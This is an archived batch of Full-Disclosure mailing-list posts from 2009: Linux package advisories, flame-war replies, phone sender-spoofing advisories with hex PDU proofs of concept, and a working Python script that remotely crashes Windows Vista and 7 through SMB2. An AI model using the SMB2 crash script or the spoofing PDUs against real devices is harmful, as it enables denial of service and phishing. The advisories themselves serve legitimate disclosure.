[Full-disclosure] [SECURITY] [DSA 1878-2] New devscripts packages fix regressions
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1878-2 secur...@debian.org http://www.debian.org/security/ Florian Weimer September 11, 2009http://www.debian.org/security/faq - Package: devscripts Vulnerability : missing input sanitation Problem type : remote Debian-specific: yes CVE Id(s) : CVE-2009-2946 This update corrects regressions introduced by the devscripts security update, DSA-1878-1. The original announcement was: Raphael Geissert discovered that uscan, a program to check for availability of new source code versions which is part of the devscripts package, runs Perl code downloaded from potentially untrusted sources to implement its URL and version mangling functionality. This update addresses this issue by reimplementing the relevant Perl operators without relying on the Perl interpreter, trying to preserve backwards compatibility as much as possible. For the old stable distribution (etch), this problem has been fixed in version 2.9.26etch5. For the stable distribution (lenny), this problem has been fixed in version 2.10.35lenny7. For the unstable distribution (sid), this problem will be fixed in version 2.10.55. We recommend that you upgrade your devscripts package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5.dsc Size/MD5 checksum: 682 c3d21fb270f822e5392ae2106788187f http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5.tar.gz Size/MD5 checksum: 432873 f32096a7e9ee2072772cd2b9f681345f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_alpha.deb Size/MD5 checksum: 390248 da966fdac92abcaafa1430b8ba675abd amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_amd64.deb Size/MD5 checksum: 399932 db2a46b29128469d5ecb92cb9b41e0ca arm architecture (ARM) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_arm.deb Size/MD5 checksum: 397770 ee1bbcf45311c38f33081824a9dd5e52 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_hppa.deb Size/MD5 checksum: 400568 2076bd94592f6396842b7d6c8524c6ce i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_i386.deb Size/MD5 checksum: 395166 838abce05486685bfe341dbc61de4522 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_ia64.deb Size/MD5 checksum: 391662 5872f444be695efce63935c5702b9b0c mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_mips.deb Size/MD5 checksum: 397248 f99f1452a7fd42b38bfbc76f6b90172c mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_mipsel.deb Size/MD5 checksum: 390184 87ec766449c652595e79a7c7032fcb16 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_powerpc.deb Size/MD5 checksum: 392430 aa784cbdb2826f2d4b97ed56ba3561cd s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_s390.deb Size/MD5 checksum: 390094 61191453fd34ce9e394869462d0922c5 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_sparc.deb Size/MD5 checksum: 398526 eb9949901ea3e2d5536cbd4d83ae5bc9 Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.10.35lenny7.tar.gz Size/MD5 checksum: 602728 618e6dd31e49ca4e2e8bf27dc47e0846 http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.10.35lenny7.dsc Size/MD5 checksum: 1417 3e86ddb193d12c2ce63a9666904754bf alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.10.35lenny7_alpha.deb Size/MD5
Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I am not smart enough to understand what you mean, all this talk with numbers is way over my head. To sign, or not to sign: that is the question: Whether 'tis the nobbler in the mail or buffer, the strings and arrows do mis-appropriate fortune, or take armor 1.4 against those floats and doubles. And by opposing end them? To spy the heap no more, and by a beep to say we send. The heartache and the thousand natural socks netcat is heir to, tis disinformation devoutly to be phished. To ply, to reap. To reap perchance to scheme: ay, there's the sub. For in that heap of death what streams may run? When we have shuffled through this portal spoil that which gave us cause: to show respect. with apologies to Shakespeare MrX T Biehn wrote: Should call yourself z3r0k3w1. It would be 'krad elite.' /obv. reference dropping. -Travis On Thu, Sep 10, 2009 at 5:23 PM, mrx m...@propergander.org.uk wrote: * *We have a code 4 on that 10-103m regards the real MrX T Biehn wrote: MrX, Dude. Just fake your own suicide. This old school trick will solicit the feds to your locale if you're actually being watched. Other advice? I want voice recordings, jpegs, vlog posts, else it didn't happen you're schizoid. -Travis On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote: TheLearner wrote: snip What would you do? I'm not sure what _I_ would do facing such a crisis, but I think the best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer (s/he has been posting to this list lately, so should be easy to track down), and then get those two uber hackers to help as well -- they'll be much more help _to you_ than any private eye ever will... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBSqoZBLIvn8UFHWSmAQKkPAf+IRDQ8cNZNFAlfWOijqiBtye2AMtIugCB OWpHgMUr0RvS+WvF8GpZYyO4puT98pLko7pq8Fpy8a3WEk1nlNcaB/t3LprghJ3J TDGM6RlsG4XGcc4IAfQwNUuV3VvgRAqQ97ZwWgYffLA8HHbCo9K/I2UqVI8gg4XT 4M8xT1AO+VwYa0mPPlBPlmgxWtcgaNF4trQKUleWBDCw0huK/w/AZqpS8jE++dN5 SrI8Iwv6CRZclSdJ4HgUjmtNEjNjWKCjmF8Z7I5eeIjU1lv7IxeEdHaN2CdHizLl nuCB9aIbCO0XvsTAAd7XAoiQ+LMK9aDwX1aSRBi0SsRz1PVAjSHK4g== =MjZH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hack-Mail.net or similar site
Hello, What do you think of web site like Hack-Mail.net or similar one? Do they really work and how? Thank you, Mamo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
you the fuckard that got owned LULz On Fri, Sep 11, 2009 at 2:36 AM, Dan Kaminsky d...@doxpara.com wrote: Beyond that, most web applications that do use SSL, still forget to set their cookies to secure (see http://fscked.org/blog/incomplete-list-alleged-vulnerable-sites ). Not to mention the hordes of sites that have SSL logins off HTTP pages. Even the oft-repeated well, the attacker won't get the plaintext password claim falls to the attacker who inserts some screen or keyboard sniffing JS into the login page. That being said, there probably is some class of attacker that can only do passive monitoring as opposed to active interception. But it's not exactly a quantization to hang one's hat on. On Thu, Sep 10, 2009 at 5:36 PM, awf awf lol-wut-h...@live.com wrote: And? Every web application sends passwords as plain text unless they are using SSL. Pretty much any encryption that they may do client side that isn't SSL is meaningless. I hardly see how being able to sniff passwords from a site that isn't using SSL is big news. -- Windows Live: Make it easier for your friends to see what you’re up to on Facebook. Find out more.http://windowslive.com/Campaign/SocialNetworking?ocid=PID23285::T:WLMTAGL:ON:WL:en-US:SI_SB_facebook:082009 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple Smartphones MMS Notification Sender Obfuscation
Security Advisory: Multiple Smartphones MMS Notification Sender Obfuscation --- Discovered by: Michael Mueller a.k.a. c0rnholio Contact: c0rnholio on domain netcologne.de Advisory Homepage: http://www.silentservices.de/adv04-2009.html Vendor Status: not contacted Fixes / Workarounds: none known Discovery Date: June, 2008 Public Disclosure: 11.09.2009 Description: A MMS Notification is part of the MMS communication flow. Usually an originator sends and mms via a service provider (SP). After uploading the message to the SP, the recipient gets a MMS notification from the SP with information like originator, subject and URL of the content. In some mobile carrier networks it is allowed to send MMS notifications directly from one mobile unit to another. Some Smartphones fail to properly display the originator of this kind of message which leads to a sender obfuscation. Impact: --- This attack can be used in combination with social engineering to mislead the recipient to access the resource specified in the content URL of the MMS notification message. If the receiving device MMS client is configured improperly this could lead to automatically download whatever content is specified in the content URL. MMS clients which do not allow access to content URLs other that the providers MMS proxy should be safe from the content, but are still vulnerable to the sender obfuscation. In addition this attack can be used to send spam and hate SMS. Tested Devices: --- The following devices have been tested and found vulnerable for this kind of attack: It is very likely that other devices and vendors are also vulnerable to this attack. - Blackberry (Tested on BB 8800, Firmware: 4.5.0.37) The BlackBerry fails device fails to properly display the originating number and displays whatever information is defined in the originator and the subject field of the MMS notification. - Windows Mobile (Tested on WM5, WM6, WM6.1, WM6.5) A Windows Mobile driven device fails to properly display the originating number and displays whatever information is defined in the originator and the subject field of the MMS notification. - Sony Ericsson W890i, W810i The Sony Ericsson W890i and W810i device fails to properly display the correct originating number and displays whatever information is defined in the originator and the subject field of the MMS notification. PoC: The following PDU can be sent to an affected device: UDH: 05 04 0b 84 23 f0 Message: 7c 06 03 be af 84 8c 82 98 31 32 33 34 00 8d 90 89 0e 80 45 76 69 6c 20 48 34 78 30 72 00 96 67 6f 74 20 72 30 30 74 3f 00 8a 80 8e 01 56 88 05 81 03 09 3a 80 83 63 68 65 63 6b 20 79 6f 75 72 20 6d 6d 73 20 63 6c 69 65 6e 74 The above PDU will display as follows (example on Windows Mobile target): Sender: Evil H4x0r Subject: got r00t? Use pduspy to send it. In addition HushSMS Version 1.0 will be available soon for Windows Mobile devices for further tests. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple Smartphones SMS Sender Obfuscation via WAP Push SI
Security Advisory: Multiple Smartphones SMS Sender Obfuscation via WAP Push SI -- Discovered by: Michael Mueller a.k.a. c0rnholio Contact: c0rnholio on domain netcologne.de Advisory Homepage: http://www.silentservices.de/adv03-2009.html Vendor Status: not contacted Fixes / Workarounds: none known Discovery Date: June, 2008 Public Disclosure: 11.09.2009 Description: WAP Push SI (Service Indication) is a special service SMS which allows operators or everyone else to provide an easy way for alerting the smartphone user about new services or online resources. (see specification WAP-167 for further details) Some Smartphones fail to properly display the originator of this kind of message which leads to a sender obfuscation. Impact: --- This attack can be used in combination with social engineering to mislead the recipient to access the resource specified in the WAP Push SI message (usually an online resource). In addition this attack can be used to send spam and hate SMS. Tested Devices: --- The following devices have been tested and found vulnerable for this kind of attack: It is very likely that other devices and vendors are also vulnerable to this attack. - Blackberry (Tested on BB 8800, Firmware: 4.5.0.37) The BlackBerry fails to report the correct originating number and display the number of the SMS service center as originator of the message - Windows Mobile (Tested on WM5, WM6, WM6.1, WM6.5) A Windows Mobile driven device fails to properly display the originating number and displays whatever information is defined in the X-WAP-Initiator-URI field. - Sony Ericsson W890i, W810i The Sony Ericsson W890i and W810i device fails to properly display the correct originating number and displays a default string instead. - Motorola RazrV3 The Motorola RazrV3 device fails to properly display the correct originating number and displays a default string instead. PoC: The following PDU can be sent to an affected device: UDH: 05 04 0b 84 23 f0 Message: dc 06 11 ae af 82 b4 83 b1 45 76 69 6c 20 48 34 78 30 72 00 02 05 6a 00 45 c6 0c 03 77 77 77 2e 73 69 6c 65 6e 74 73 65 72 76 69 63 65 73 2e 64 65 2f 61 64 76 30 33 2d 32 30 30 39 2e 68 74 6d 6c 00 01 03 67 6f 74 20 72 30 30 74 3f 00 01 01 The above PDU will display as follows (example on Windows Mobile target): Sender: Evil H4x0r Subject: got r00t? Message: http://www.silentservices.de/adv03-2009.html Use pduspy to send it. In addition HushSMS Version 1.0 will be available soon for Windows Mobile devices for further tests. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0xHACK - Oxford Info-Sec Group
A couple of us in Oxford have decided to start a small, special interests group. Anyone interested is welcome to come along, no charge. September 15th, 2009 Lamb Flag, Oxford. 8pm Agenda The first meeting will focus on organising following meetings and setting an agenda. There will be a demonstration on the use of OllyDbg as a _legal_ cracking tool and discussion regarding fuzzing frameworks. http://0xhack.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:229 ] cyrus-imapd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:229 http://www.mandriva.com/security/ ___ Package : cyrus-imapd Date: September 11, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in cyrus-imapd: Buffer overflow in the SIEVE script component (sieve/script.c) in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14 allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error (CVE-2009-2632). This update provides a solution to this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2632 ___ Updated Packages: Mandriva Linux 2008.1: 8cc343d32cbe0bb7498e48c545e43508 2008.1/i586/cyrus-imapd-2.3.11-6.1mdv2008.1.i586.rpm 7977c0b95053bdcc23cf0272762aae6a 2008.1/i586/cyrus-imapd-devel-2.3.11-6.1mdv2008.1.i586.rpm 67bbec2bd3009cc6cea47fa4cd48fdbc 2008.1/i586/cyrus-imapd-murder-2.3.11-6.1mdv2008.1.i586.rpm c764b6d6b5d1b6c81b0ad496ff546caf 2008.1/i586/cyrus-imapd-nntp-2.3.11-6.1mdv2008.1.i586.rpm f146d72d5e0094dae92c5f775445e9b9 2008.1/i586/cyrus-imapd-utils-2.3.11-6.1mdv2008.1.i586.rpm 69eb50891cbf82c122320a0f619f4cdc 2008.1/i586/perl-Cyrus-2.3.11-6.1mdv2008.1.i586.rpm 1ff485cd9434cf4fd67194d6528028b4 2008.1/SRPMS/cyrus-imapd-2.3.11-6.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 010faa01f06afbda030527cd2aa0683c 2008.1/x86_64/cyrus-imapd-2.3.11-6.1mdv2008.1.x86_64.rpm 10a37e876bef9e2448b839cb4fe1bcfd 2008.1/x86_64/cyrus-imapd-devel-2.3.11-6.1mdv2008.1.x86_64.rpm 1627455d5048e7e54a08ebaaccd9aa0d 2008.1/x86_64/cyrus-imapd-murder-2.3.11-6.1mdv2008.1.x86_64.rpm f5afffe07c9e2d8f9d24e2494904e04e 2008.1/x86_64/cyrus-imapd-nntp-2.3.11-6.1mdv2008.1.x86_64.rpm bed786208ab8427d63f1a0f7fae3cfde 2008.1/x86_64/cyrus-imapd-utils-2.3.11-6.1mdv2008.1.x86_64.rpm 330c2e33be0c0e5cdc305360d5c0a4f7 2008.1/x86_64/perl-Cyrus-2.3.11-6.1mdv2008.1.x86_64.rpm 1ff485cd9434cf4fd67194d6528028b4 2008.1/SRPMS/cyrus-imapd-2.3.11-6.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 861b1478ad055a9a6f07eb8967ff547a 2009.0/i586/cyrus-imapd-2.3.12-0.p2.4.1mdv2009.0.i586.rpm 861c1bfcad95c60c11522e8335295e7a 2009.0/i586/cyrus-imapd-devel-2.3.12-0.p2.4.1mdv2009.0.i586.rpm 5b0ecc7269cb9b413ef88ea06dc5fe15 2009.0/i586/cyrus-imapd-murder-2.3.12-0.p2.4.1mdv2009.0.i586.rpm 7849f9bbe45a3057c05104a9a1762474 2009.0/i586/cyrus-imapd-nntp-2.3.12-0.p2.4.1mdv2009.0.i586.rpm 09c14dd031920d5a8969b70f84fc49a3 2009.0/i586/cyrus-imapd-utils-2.3.12-0.p2.4.1mdv2009.0.i586.rpm 16972adb346b781505b3f5d3f3c71946 2009.0/i586/perl-Cyrus-2.3.12-0.p2.4.1mdv2009.0.i586.rpm 13b073cf3d8941c69f1cbadf23824789 2009.0/SRPMS/cyrus-imapd-2.3.12-0.p2.4.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 95d7b331e1177ade9a191f86c0a0cf79 2009.0/x86_64/cyrus-imapd-2.3.12-0.p2.4.1mdv2009.0.x86_64.rpm bd05df88b56999da5c13e8d8792da7b8 2009.0/x86_64/cyrus-imapd-devel-2.3.12-0.p2.4.1mdv2009.0.x86_64.rpm 4e64259aee697cdaf72cd00e658a8598 2009.0/x86_64/cyrus-imapd-murder-2.3.12-0.p2.4.1mdv2009.0.x86_64.rpm 72ebe80164830a43ab6bf845809e4d55 2009.0/x86_64/cyrus-imapd-nntp-2.3.12-0.p2.4.1mdv2009.0.x86_64.rpm 7f4546e7272547df7e652c72b1b105b7 2009.0/x86_64/cyrus-imapd-utils-2.3.12-0.p2.4.1mdv2009.0.x86_64.rpm da57e28942a66e52d3e8dfe60bde32a5 2009.0/x86_64/perl-Cyrus-2.3.12-0.p2.4.1mdv2009.0.x86_64.rpm 13b073cf3d8941c69f1cbadf23824789 2009.0/SRPMS/cyrus-imapd-2.3.12-0.p2.4.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 58b94016098b3a5364221e39a123c39e 2009.1/i586/cyrus-imapd-2.3.14-1.1mdv2009.1.i586.rpm 66cd4df4cfa7b18e1c79e0d211fb81aa 2009.1/i586/cyrus-imapd-devel-2.3.14-1.1mdv2009.1.i586.rpm 0c2e94276c31f2081ad111ab3ceecd29 2009.1/i586/cyrus-imapd-murder-2.3.14-1.1mdv2009.1.i586.rpm c73fc447b15a7f4839c39a9771a8ac79 2009.1/i586/cyrus-imapd-nntp-2.3.14-1.1mdv2009.1.i586.rpm d507d2b74240e58285e43d77ae2fda6b 2009.1/i586/cyrus-imapd-utils-2.3.14-1.1mdv2009.1.i586.rpm 517cce2bb7391239c8aecbd8930d1474 2009.1/i586/perl-Cyrus-2.3.14-1.1mdv2009.1.i586.rpm 26aaa8d38cc9558e96928c50580246be 2009.1/SRPMS/cyrus-imapd-2.3.14-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 5adbd549a75be7f0652a94a806990908 2009.1/x86_64/cyrus-imapd-2.3.14-1.1mdv2009.1.x86_64.rpm abb74664517821be7ed5e1325e525cea
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Advisory updated :
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=
I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.
III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used to identify the SMB dialect that will be used for
futher communication.
IV. PROOF OF CONCEPT
-
Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be \x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
R2, Windows 7 RC.
VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx
VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release
XI. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them
advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0xHACK - Oxford Info-Sec Group
Apparently they didn't tell him that 'h' wasn't a valid hex symbol either. --Rohit Patnaik Lolek of TK53 wrote: On Fri, Sep 11, 2009 at 2:40 PM, James Whayman whayman...@gmail.com wrote: http://0xhack.org didn't your profs tell you that K is no valid hexadecimal character? scnr ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:230 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:230 http://www.mandriva.com/security/ ___ Package : pidgin Date: September 11, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 ___ Problem Description: Security vulnerabilities has been identified and fixed in pidgin: The msn_slplink_process_msg function in libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by sending multiple crafted SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary memory location. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1376 (CVE-2009-2694). Unspecified vulnerability in Pidgin 2.6.0 allows remote attackers to cause a denial of service (crash) via a link in a Yahoo IM (CVE-2009-3025) protocols/jabber/auth.c in libpurple in Pidgin 2.6.0, and possibly other versions, does not follow the require TLS/SSL preference when connecting to older Jabber servers that do not follow the XMPP specification, which causes libpurple to connect to the server without the expected encryption and allows remote attackers to sniff sessions (CVE-2009-3026). libpurple/protocols/irc/msgs.c in the IRC protocol plugin in libpurple in Pidgin before 2.6.2 allows remote IRC servers to cause a denial of service (NULL pointer dereference and application crash) via a TOPIC message that lacks a topic string (CVE-2009-2703). The msn_slp_sip_recv function in libpurple/protocols/msn/slp.c in the MSN protocol plugin in libpurple in Pidgin before 2.6.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an SLP invite message that lacks certain required fields, as demonstrated by a malformed message from a KMess client (CVE-2009-3083). The msn_slp_process_msg function in libpurple/protocols/msn/slpcall.c in the MSN protocol plugin in libpurple 2.6.0 and 2.6.1, as used in Pidgin before 2.6.2, allows remote attackers to cause a denial of service (application crash) via a handwritten (aka Ink) message, related to an uninitialized variable and the incorrect UTF16-LE charset name (CVE-2009-3084). The XMPP protocol plugin in libpurple in Pidgin before 2.6.2 does not properly handle an error IQ stanza during an attempted fetch of a custom smiley, which allows remote attackers to cause a denial of service (application crash) via XHTML-IM content with cid: images (CVE-2009-3085). This update provides pidgin 2.6.2, which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3026 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2703 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3083 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3085 http://pidgin.im/news/security/ ___ Updated Packages: Mandriva Linux 2009.0: dd2135de88f01028217b4146dbfdabc0 2009.0/i586/finch-2.6.2-1.1mdv2009.0.i586.rpm 0a62ef0d115db1d059ba8683d8b78543 2009.0/i586/libfinch0-2.6.2-1.1mdv2009.0.i586.rpm d9138da684311ab0e77748b5d9251324 2009.0/i586/libpurple0-2.6.2-1.1mdv2009.0.i586.rpm a795ae8b0a6d37dae3cdd5d626a1054b 2009.0/i586/libpurple-devel-2.6.2-1.1mdv2009.0.i586.rpm e02ee9ac19b50b6313ab7e95955fc7dd 2009.0/i586/pidgin-2.6.2-1.1mdv2009.0.i586.rpm d9da1b8df1a61a3c6a61fb661d0af935 2009.0/i586/pidgin-bonjour-2.6.2-1.1mdv2009.0.i586.rpm fa74aa490a4a78a443f78273bd80c129 2009.0/i586/pidgin-client-2.6.2-1.1mdv2009.0.i586.rpm fba34f0c6056aaeda170fb38bafc50f8 2009.0/i586/pidgin-gevolution-2.6.2-1.1mdv2009.0.i586.rpm aa062eba94ee8a8857241879f83bb680 2009.0/i586/pidgin-i18n-2.6.2-1.1mdv2009.0.i586.rpm 3583204db49425789559de87f9c20e84 2009.0/i586/pidgin-meanwhile-2.6.2-1.1mdv2009.0.i586.rpm 83e2b09d13dc5880ce3779a659fa6edd 2009.0/i586/pidgin-mono-2.6.2-1.1mdv2009.0.i586.rpm 13115c52a371163466c9f8fb02c3b3f1 2009.0/i586/pidgin-perl-2.6.2-1.1mdv2009.0.i586.rpm 57c8369439d8ac73444f881e47bc7c7b 2009.0/i586/pidgin-plugins-2.6.2-1.1mdv2009.0.i586.rpm 1fe519efa96037e5b95360e6967fa872 2009.0/i586/pidgin-silc-2.6.2-1.1mdv2009.0.i586.rpm ab47db7786ec117a66317dc91328117c 2009.0/i586/pidgin-tcl-2.6.2-1.1mdv2009.0.i586.rpm 3c72a8f93d85a71a5ec62065c71ac866
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
On Fri, 11 Sep 2009 12:23:17 +0200, D-vice said: you the fuckard that got owned You're just jealous that Dan is well-known enough to be a target, and quite likely jealous of the fact that Dan *has* a site to be targeted. pgpufMM7nv3G7.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:228 ] libneon
